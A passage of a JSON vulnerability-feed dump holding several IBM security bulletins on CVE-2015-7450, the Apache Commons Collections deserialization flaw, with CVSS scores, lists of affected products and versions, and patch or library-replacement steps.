"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:42", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Tivoli Network Manager Transmission Edition (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:42", "id": "E432DAD10EFE3753090EF63CF4FCD4A0EC759F3B4E8CBBF27B3179085A515230", "href": "https://www.ibm.com/support/pages/node/273133", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:59", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Tivoli . Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nTivoli Workload Scheduler is potentially impacted by the listed vulnerability since it potentially affects secure communications between eWAS or WebSphere and subcomponents. \n \nThe affected versions are: \nTivoli Workload Scheduler Distributed 8.6.0 \nTivoli Dynamic Workload Console 8.6.0 \nTivoli Workload Scheduler z/OS Connector 8.6.0 \nTivoli Workload Scheduler Distributed 9.1.0 \nTivoli Dynamic Workload Console 9.1.0 \nTivoli Workload Scheduler Distributed 9.2.0 \nTivoli Dynamic Workload Console 9.2.0 \nTivoli Workload Scheduler Distributed 9.3.0 \nTivoli Dynamic Workload Console 9.3.0\n\n## Remediation/Fixes\n\nIBM has provided patches for all embedded WebSphere or WebSphere affected versions. Follow the instructions in the link below to install the fixes for TWS 9.1, 9.2 and 9.3 : \n \n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n \nThe fixes can be applied on top of TWS version 8.6 only after the following security bulletin has been applied to upgrade the version of embedded WebSphere to the latest level \n \n[_http://www-01.ibm.com/support/docview.wss?uid=swg21700706_](<http://www-01.ibm.com/support/docview.wss?uid=swg21700706%20>) \n \n_For__ unsupported versions, releases or platforms__ IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:23", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Tivoli Workload Scheduler (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:23", "id": "14D6BD9FB21D986F7A7372B530E1023CD0FF42323E4743E166603718FA4482AC", "href": "https://www.ibm.com/support/pages/node/272373", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:39:56", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Tivoli Netcool Configuration Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes. \n \n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nITNCM version 6.4.1.3 \nITNCM version 6.3.0.6| Embedded IBM WebSphere Application Server eWAS 7.0 \n \n## Remediation/Fixes\n\n_ <Product_| _ VRMF_| _ APAR_| _ Remediation/First Fix_ \n---|---|---|--- \n_ ITNCM_| _ 6.4.1.3 IF001_| _ none_| [_http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Tivoli&product=ibm/Tivoli/Tivoli+Netcool+Configuration+Manager&release=6.4.1.3&platform=All&function=fixId&fixids=ITNCM_6.4.1.3_IF001&includeRequisites=1&includeSupersedes=0&downloadMethod=http_](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Tivoli&product=ibm/Tivoli/Tivoli+Netcool+Configuration+Manager&release=6.4.1.3&platform=All&function=fixId&fixids=ITNCM_6.4.1.3_IF001&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n_ ITNCM_| _ 6.3.0.6 IF004_| _ none_| [http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Tivoli+Netcool+Configuration+Manager&release=6.3.0.6&platform=All&function=all](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Tivoli+Netcool+Configuration+Manager&release=6.3.0.6&platform=All&function=all>) \n \n_For ITNCM 6.2.x IBM recommends upgrading to a fixed, supported version/release/platform of the product._ \n\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-22T16:30:15", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Tivoli Netcool Configuration Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-01-22T16:30:15", "id": "D9F9C21739CE0374485FD9F451E99B1E3D3DD763F365282CE7DBE1FD581588A1", "href": "https://www.ibm.com/support/pages/node/273495", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:35", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM WebSphere Appliance Management Center.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM WebSphere Appliance Management Center: 5.0\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \n_WebSphere Appliance Management Center_| _V5.0.0_| \n| [_Link to download_](<https://www-304.ibm.com/support/docview.wss?uid=swg24032265>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Appliance Management Center (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": "B4808CCA5100583DB06B93877F807E289BFD2DCA8CC87EE2179C8D3FDCCB1052", "href": "https://www.ibm.com/support/pages/node/272575", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:40", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Enterprise Service Bus. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [Vulnerability in Apache Commons affect IBM WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes. \n\n## Affected Products and Versions\n\nWebSphere Enterprise Service Bus V7.0 \nWebSphere Enterprise Service Bus V7.5\n\n## ", "cvss3": {}, "published": "2018-06-15T07:03:53", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in\u00a0WebSphere Application Server\u00a0shipped with\u00a0WebSphere Enterprise Service Bus (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:03:53", "id": "CFCAA39F64688F83B2BE2991B246FED2B4DFFCF75B54FAABF373FCAAD237C4B3", "href": "https://www.ibm.com/support/pages/node/272875", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T21:42:57", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM i.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nReleases 6.1, 7.1 and 7.2 of IBM i are affected. \n\n## Remediation/Fixes\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by WebSphere Application Server and WebSphere Application Server Hypervisor Edition. This vulnerability does not affect the IBM HTTP Server or versions of WebSphere Application Server prior to Version 7.0. Please see the following for fixes: \n \nIBM has provided an Interim Fix for each of the following WebSphere Application Server releases: 7.0, 8.0 and 8.5. The fix will be included in the following \nFix Packs: 7.0.0.41, 8.0.0.12 and 8.5.5.8. Please see details in the following URL: \n \n[_http://www-01.ibm.com/support/docview.wss?uid=swg21970575_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n \nIn addition, the integrated application server can be fixed by applying a PTF to IBM i. \n\n[_http://www-933.ibm.com/support/fixcentral/_](<http://www-933.ibm.com/support/fixcentral/>)\n\n \nReleases 6.1, 7.1 and 7.2 of IBM i are supported and will be fixed. \n \n**Release 6.1 \u2013 SI58494** \n**Release 7.1 \u2013 SI58495** \n**Release 7.2 \u2013 SI58496** \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n \n**_Important note: _**_IBM recommends that all users running unsupported versions of affected products upgrade to supported and fixed version of affected products._\n\n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-18T14:26:38", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM i (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-18T14:26:38", "id": "B634FF2E7FC1F3330432FBCA9743C474852276C64003951811F2A870EB1D6D85", "href": "https://www.ibm.com/support/pages/node/666627", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:53", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Rational Application Developer for WebSphere Software.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)\n\n \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.\n\n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Rational Application Developer for WebSphere Software 9.5 and earlier \nIBM Rational Application Developer for WebSphere Software Standard Edition 8.0\n\n## Remediation/Fixes\n\nUpdate Apache Commons Collections in the product to address this vulnerability: \n \n\n\n**Product**| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nRational Application Developer| 8.0 through 9.5| PI53606| \n\n * For all versions, apply [Update to Apache Commons Collections for CVE-2015-7450](<http://www.ibm.com/support/docview.wss?uid=swg24041395>)\n * For the WebSphere Application Server 7.0 Test Environment, apply [WebSphere Application Server 7.0 Test Environment Extension Fix Pack 39 (7.0.0.39)](<http://www.ibm.com/support/docview.wss?uid=swg24041415>)\n * For WebSphere Application Server versions 8.0 and 8.5, see [Security Bulletin: Vulnebrability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:57", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Rational Application Developer for WebSphere Software (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:57", "id": "56089216FE5BBEF3CB97441EEB8BE05F1F746C5131D22F24180904B3788E6C15", "href": "https://www.ibm.com/support/pages/node/274057", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:44", "description": "## Summary\n\nIBM WebSphere Application Server Liberty Profile and Apache Commons are shipped as components of IBM Support Assistant Team Server. The recommended solution is to install the fix made available by IBM WebSphere Application Server and remove the Apache Commons Collections Library bundled with IBM Support Assistant Team Server. \n\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Support Assistant Team Server version 5.0.0, 5.0.1, 5.0.1.1, 5.0.2 and 5.0.2.1 \n\n## Remediation/Fixes\n\nThe recommended solution is to install the fix made available by IBM WebSphere Application Server and remove the Apache Commons Collections Library bundled with IBM Support Assistant Team Server. \n** \nFor V5.0.0 through 5.0.2.1:**\n\n * If you are not at the latest version of IBM Support Assistant (V5.0.2.1), you need to upgrade** **[_http://www-01.ibm.com/software/support/isa/teamserver.html_](<http://www-01.ibm.com/software/support/isa/teamserver.html>)\n * Remove the Apache Commons Collections v3.2.1 library under <isa_install>/ISA5/wlp/usr/servers/isa/apps/ISA5.ear/lib\n * Apply the [IBM WebSphere Application Server Liberty Profile Interim Fix ](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>)\n * Download the archive fix 8556-wlp-archive-IFPI52103.jar that applies to the Liberty profile, fixpack 8.5.5.6. \n * Save the 8556-wlp-archive-IFPI52103.jar file to the <isa_install>/ISA5/ directory\n * Open the console and run the command \"java -jar 8556-wlp-archive-IFPI52103.jar\"\n * Press enter to accept the default directory value <isa_install>/ISA5/wlp\n * Stop ISA\n * Once you start ISA you should see the following message on the <isa_install>/ISA5/wlp/usr/servers/isa/logs/console.log\n * [AUDIT ] CWWKF0015I: The server has the following interim fixes installed: PI52103. \n \nRefer to [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and additional information about fixes. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:14", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in Apache Commons and IBM WebSphere Application Server\u00a0Liberty Profile shipped with IBM Support Assistant Team Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:14", "id": "33F3D4BD9A0409FDFA7A6FD39D37CE20C133CA720204241EF781E5F8B97A23E3", "href": "https://www.ibm.com/support/pages/node/272625", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:51", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by the Apache Software Foundation. \n\n## Vulnerability Details\n\nIBM Rational DOORS Web Access is affected by the following vulnerability: \n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)\n\n \n** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \n**CVSS Base Score:** 9.8 \n**CVSS Temporal Score:** See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nRational DOORS Web Access version 9.6.1.4, 9.6.1.3, 9.6.1.2, 9.6.1.1, 9.6.1.0, 9.6.0.x, 9.5.2.x, 9.5.1.x, 9.5.0.x, 1.5.0.x, 1.4.0.x.\n\n## Remediation/Fixes\n\nA fix for this vulnerability is available from the Apache Software Foundation: \n\n**Rational DOORS Web Access**| **Remediation/Fix** \n---|--- \n1.4.0.x - 9.6.1.x| commons-collections-3.2.2.jar \n \nReplace the commons-collections-3.2.1.jar file in your Rational DOORS Web Access installation with the commons-collections-3.2.2.jar file.\n\n 1. Download the commons-collections-3.2.2-bin.zip file at:_ \n_[_http://commons.apache.org/proper/commons-collections/download_collections.cgi_](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>) \nRelease notes are available here:_ \n_[_http://commons.apache.org/proper/commons-collections/release_3_2_2.html_](<http://commons.apache.org/proper/commons-collections/release_3_2_2.html>)\n 2. Extract the commons-collections-3.2.2.jar file from the file that you downloaded.\n 3. Stop the Rational DOORS Web Access server and the broker. \n 4. Remove this file in your installation: <installation directory>\\IBM\\Rational\\DOORS Web Access\\<version number>\\broker\\lib\\optional\\commons-collections-3.2.1.jar\n 5. Copy the new commons-collections-3.2.2.jar to the same location.\n 6. Start the broker and the Rational DOORS Web Access server.\n \n \nFor information on stopping and starting components, see [Starting, stopping, and removing Rational DOORS Web Access](<http://www-01.ibm.com/support/knowledgecenter/SSYQBZ_9.6.1/com.ibm.rational.dwa.install.doc/topics/c_rundoorswebaccess.html>). \n\n\n_For versions for Rational DOORS Web Access that are earlier than version 1.4.0.x, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:42", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational DOORS Web Access (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:42", "id": "5CA427D20F513F1CC81AEF9C09677EF6584321B0D5FFE5209255F3B168E636A4", "href": "https://www.ibm.com/support/pages/node/271839", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:56:16", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of SmartCloud Provisioning Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM SmartCloud Provisioning 1.2| IBM WebSphere Application Server 8.0 \nIBM SmartCloud Provisioning 2.1, 2.3, 2.3.0.1| IBM WebSphere Application Server 8.0 \n \n## Remediation/Fixes\n\nConsult security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for information about fixes. \n \nIf you are running IBM SmartCloud Provisioning 2.1 contact [_IBM support_](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>). \n \nFor unsupported. version/release IBM recommends upgrading to a fixed, supported version/release of the product.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:47", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with SmartCloud Provisioning (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 